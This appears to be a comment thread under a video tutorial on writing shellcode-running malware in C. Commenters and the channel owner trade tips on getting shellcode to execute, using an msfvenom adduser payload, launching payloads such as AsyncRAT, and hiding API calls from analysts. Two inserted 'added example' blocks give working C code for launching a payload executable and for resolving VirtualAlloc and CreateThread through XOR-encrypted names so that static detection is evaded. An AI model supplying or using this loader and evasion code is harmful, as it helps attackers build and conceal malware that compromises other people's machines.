Dayummm.. keep it on,
sir... big fan always....
Thank you man, full support from my side. Please make more videos like this (creating advanced malware using C). And please make the font size bigger, because I use a magnifier to watch your videos 😂😂
Sorry about the font size issue, I did correct that mistake in the latest video 😁👍🏻
good stuff @ActiveXSploit !!! Keep it up. Also... Options > Theme > DarkMode ftw ;)
Haha 😂 thank you!
Thanks for the video... please keep making them, really useful content
What an awesome video! Thank you!
Amazing, just what I was looking for!! Hope to learn more
Any tips for heuristics?
Please, help me! How do we set up the environment to run the shellcode in Windows 10? I made this malware, but it doesn't work. I also created it in Flare-VM, but it also doesn't work.
Thanks for another great tutorial.
I have an issue: I compiled the source code successfully, but when I start the executable it doesn't start Notepad; I found in Event Viewer that the application crashed. Do you have a recommendation for where to start looking for the cause of this issue? (Env: Win 10 Enterprise, Visual Studio 2022)
Please check: if you are compiling the code with a 64-bit compiler, you have to use 64-bit shellcode; if you are compiling with a 32-bit compiler, use a 32-bit version of the shellcode.
@ActiveXSploit Ah, let me check. I definitely used a 32-bit compiler on Kali, but the shellcode is x64. I will keep you posted here.
Okay, so I used the VS2022 Community edition to compile the source code (as you did: cl shellcode.c); Notepad is still not opening and the program dies (of course, it's enabled in Defender). Checking the Event Viewer messages, there is an error code 0x0000005 - access denied. The only thing I can think of here is DEP, but I cannot add this program as an exception.
Turned off DEP - the program still dies - possibly a memory access violation.
Finally: I used an adduser payload from msfvenom - it is platform independent on Windows - and successfully managed to get it running. NOTE for all readers: it only works if the shellcode is running as administrator (adding a user is an administrative task).
Great stuff man
Nice videos! Also, you sound a lot like HackerSploit, I almost thought you were the same person haha
Hello, this might seem dumb to ask, but does this work in C too (not just C++)?
Yes mate, it does
How can we run another payload exe, like AsyncRAT etc., using the WinAPI?
You can use the ShellExecute function call or the CreateProcess one.
Yes, I guess this is the method for executing another PE inside your main PE program.
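Added example for the CreateProcess route suggested above (this is editorial code, not the video's source). It launches a second PE from C, waits for it, and returns its exit code. The helper that builds the command line is portable and exists to show the one pitfall worth knowing here: the executable path must be quoted as argv[0], and lpApplicationName should be passed explicitly, otherwise a path like C:\Program Files\... is split at the space. The notepad.exe path and the payload path in main() are assumed, not taken from the page.

```c
/* Added example: run another PE with CreateProcessA and wait for it.
 * Compiles everywhere; the Windows-only part is guarded by _WIN32. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* Builds the command line CreateProcess hands to the child: argv[0] quoted so a
 * path containing spaces is not split, then the extra arguments (if any).
 * Returns 0 on success, -1 if `out` (of capacity `cap`) is too small. */
static int build_cmdline(const char *exe, const char *args, char *out, size_t cap) {
    int n = (args && *args) ? snprintf(out, cap, "\"%s\" %s", exe, args)
                            : snprintf(out, cap, "\"%s\"", exe);
    return (n < 0 || (size_t)n >= cap) ? -1 : 0;
}

#ifdef _WIN32
/* Starts `exe` with `args`, waits until it exits and returns its exit code,
 * or (DWORD)-1 if CreateProcessA fails (GetLastError() says why). */
static DWORD run_pe(const char *exe, const char *args) {
    char cmd[1024];                      /* must be writable: the API may modify it */
    if (build_cmdline(exe, args, cmd, sizeof cmd) != 0) return (DWORD)-1;

    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof si);
    si.cb = sizeof si;
    ZeroMemory(&pi, sizeof pi);

    /* lpApplicationName is given explicitly so the loader neither searches PATH
     * nor tries "C:\Program" as the image when the path has spaces. */
    if (!CreateProcessA(exe, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
        return (DWORD)-1;

    WaitForSingleObject(pi.hProcess, INFINITE);   /* blocks until the child exits */
    DWORD code = 0;
    GetExitCodeProcess(pi.hProcess, &code);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return code;
}
#endif

int main(void) {
    char cmd[256];
    /* Constructed sample path (assumed, not from the page) to show the quoting. */
    if (build_cmdline("C:\\Program Files\\Tool\\payload.exe", "--silent", cmd, sizeof cmd) == 0)
        printf("command line: %s\n", cmd);
#ifdef _WIN32
    /* Assumed location of notepad.exe; the call returns only when Notepad is closed. */
    DWORD rc = run_pe("C:\\Windows\\System32\\notepad.exe", NULL);
    printf("child exit code: %lu\n", (unsigned long)rc);
#else
    puts("not Windows: only the command-line builder ran");
#endif
    return 0;
}
```

ShellExecuteA("open", path, ...) does the same job with shell semantics (file associations, "runas" for elevation) but gives you no process handle to wait on unless you use ShellExecuteExA with SEE_MASK_NOCLOSEPROCESS; CreateProcessA is the better fit when you need the exit code.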
Need spyware in C
hahahahahahaha
Good job, can you share your VM environment files? Thanks!!!
Why did we need to sleep at the end?
If we don't add a sleep function, the thread will not execute; try it on your own, it won't work. It will execute, but you won't see any results; the shellcode won't execute.
I can sense you are Indian, bro, aren't you? Keep making videos on the channel. Your content is underrated. It's totally fabulous.
Yes 😁, Thank you!
i sense a new mic ? 👀
👀👀
Roadmap for mal dev????
I will be uploading a video on that soon, Stay tuned for further updates!
@ActiveXSploit Looking forward to it!
Great content man, thanks for that. Just zoom in a little in the edit, my eyes are weak hahahah peace
Really sorry about the small size of the screen, I just forget it every time, but it won't happen next time ;)
Is this HackerSploit?
Nah mate 😂
thanks
Great
Please don't stop making vids
Any malware course?
I'm sorry for not uploading videos, my final year exams are about to start, I have to focus on them.
Yes, there is a good course by the Sektor7 team on malware development. Here is the link to it:
www.udemy.com/share/103xaK3@HTifBnsP4YhM8S4C_0Lyawbw4ux55qSfQIK0BnmMUcvm-X5ArRPOFchlVDYSbVdSJQ==/
@ActiveXSploit Thanks! I will take the course. If you know of any more advanced courses, let me know please! :)
Sektor7 has an advanced course; look it up on their site, you'll find it.
You sound like HackerSploit, but with a little bit of an Indian accent.
thanks
I need a microscope to see that tiny font.
I apologize for that mate, I've fixed the font size issue in the videos uploaded after this one.
@ActiveXSploit Thanks, I will subscribe in appreciation.
I have used SysWhispers, it's a really cool way to hide API calls.
You can also hide the API calls with GetProcAddress and GetModuleHandle. Just get a handle to kernel32.dll and import the functions you want, though the API call name would get detected if the analyst runs strings on the binary; for that you could use some string encryption to hide the API call string.
@ActiveXSploit Cool, I've never thought of this. But does it evade Windows Defender?
I believe it will; it should pass the static analysis phase, though the malware should get detected in the behavioural analysis phase.
@ActiveXSploit I thought so, since you need a way to remove or evade the Defender API hooking.
I didn't know of that, but yeah, I tried it the way I mentioned above and it does work.
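Added example (editorial code, not from the video or from the commenters) of the approach described in this thread: resolve kernel32 exports at runtime with GetModuleHandleA/GetProcAddress, and keep the module and function names XOR-encrypted in the binary so `strings` does not list "VirtualAlloc" or "CreateThread". The single-byte key 0x5A and the encrypted byte tables are constructed here for illustration; the plaintext appears only in source comments, which never reach the compiled image.

```c
/* Added example: runtime API resolution with encrypted names.
 * Windows-only parts are guarded by _WIN32; the decryption helper is portable. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>
#ifdef _WIN32
#include <windows.h>
#endif

#define XOR_KEY 0x5A   /* illustrative key; a real build would use a longer, per-build key */

/* Names pre-XORed with XOR_KEY (constructed by hand). Plaintext only in comments. */
static const unsigned char enc_kernel32[] =
    {0x31,0x3F,0x28,0x34,0x3F,0x36,0x69,0x68,0x74,0x3E,0x36,0x36}; /* "kernel32.dll" */
static const unsigned char enc_virtualalloc[] =
    {0x0C,0x33,0x28,0x2E,0x2F,0x3B,0x36,0x1B,0x36,0x36,0x35,0x39}; /* "VirtualAlloc" */
static const unsigned char enc_createthread[] =
    {0x19,0x28,0x3F,0x3B,0x2E,0x3F,0x0E,0x32,0x28,0x3F,0x3B,0x3E}; /* "CreateThread" */

/* Decrypts `len` bytes of `enc` into `out` (NUL-terminated; out holds len+1 bytes).
 * XOR with the same key is its own inverse. Returns `out` for convenience. */
static char *decrypt_name(const unsigned char *enc, size_t len, char *out) {
    for (size_t i = 0; i < len; i++)
        out[i] = (char)(enc[i] ^ XOR_KEY);
    out[len] = '\0';
    return out;
}

/* Zeroes the plaintext once it has been used; volatile stops the compiler
 * from dropping the store as dead. */
static void wipe(char *s, size_t n) {
    volatile char *p = s;
    while (n--) *p++ = 0;
}

#ifdef _WIN32
typedef LPVOID (WINAPI *VirtualAlloc_t)(LPVOID, SIZE_T, DWORD, DWORD);
typedef HANDLE (WINAPI *CreateThread_t)(LPSECURITY_ATTRIBUTES, SIZE_T,
                                        LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);

/* Looks up one export by encrypted module and function name. kernel32.dll is
 * mapped into every process, so GetModuleHandleA suffices (no LoadLibrary). */
static FARPROC resolve(const unsigned char *enc_mod, size_t mlen,
                       const unsigned char *enc_fn, size_t flen) {
    char mod[64], fn[64];
    HMODULE h = GetModuleHandleA(decrypt_name(enc_mod, mlen, mod));
    FARPROC p = h ? GetProcAddress(h, decrypt_name(enc_fn, flen, fn)) : NULL;
    wipe(mod, sizeof mod);
    wipe(fn, sizeof fn);
    return p;
}
#endif

int main(void) {
    char name[64];
    printf("decrypted: %s\n", decrypt_name(enc_virtualalloc, sizeof enc_virtualalloc, name));
#ifdef _WIN32
    VirtualAlloc_t pVirtualAlloc = (VirtualAlloc_t)resolve(
        enc_kernel32, sizeof enc_kernel32, enc_virtualalloc, sizeof enc_virtualalloc);
    CreateThread_t pCreateThread = (CreateThread_t)resolve(
        enc_kernel32, sizeof enc_kernel32, enc_createthread, sizeof enc_createthread);
    if (!pVirtualAlloc || !pCreateThread) { puts("resolve failed"); return 1; }
    printf("VirtualAlloc=%p CreateThread=%p\n", (void *)pVirtualAlloc, (void *)pCreateThread);

    /* Use the resolved pointer exactly like the import would be used. */
    LPVOID mem = pVirtualAlloc(NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    printf("allocated %p via resolved VirtualAlloc\n", mem);
    VirtualFree(mem, 0, MEM_RELEASE);
#endif
    return 0;
}
```

Two caveats that match what this thread concludes: GetModuleHandleA and GetProcAddress themselves still sit in the import table, which is a well-known indicator on its own, and the names exist in clear text in memory for the instant between decryption and lookup. Nothing here touches the user-mode hooks Defender places on the resolved functions, so behavioural detection is unaffected; SysWhispers-style direct syscalls, mentioned above, address that separate problem.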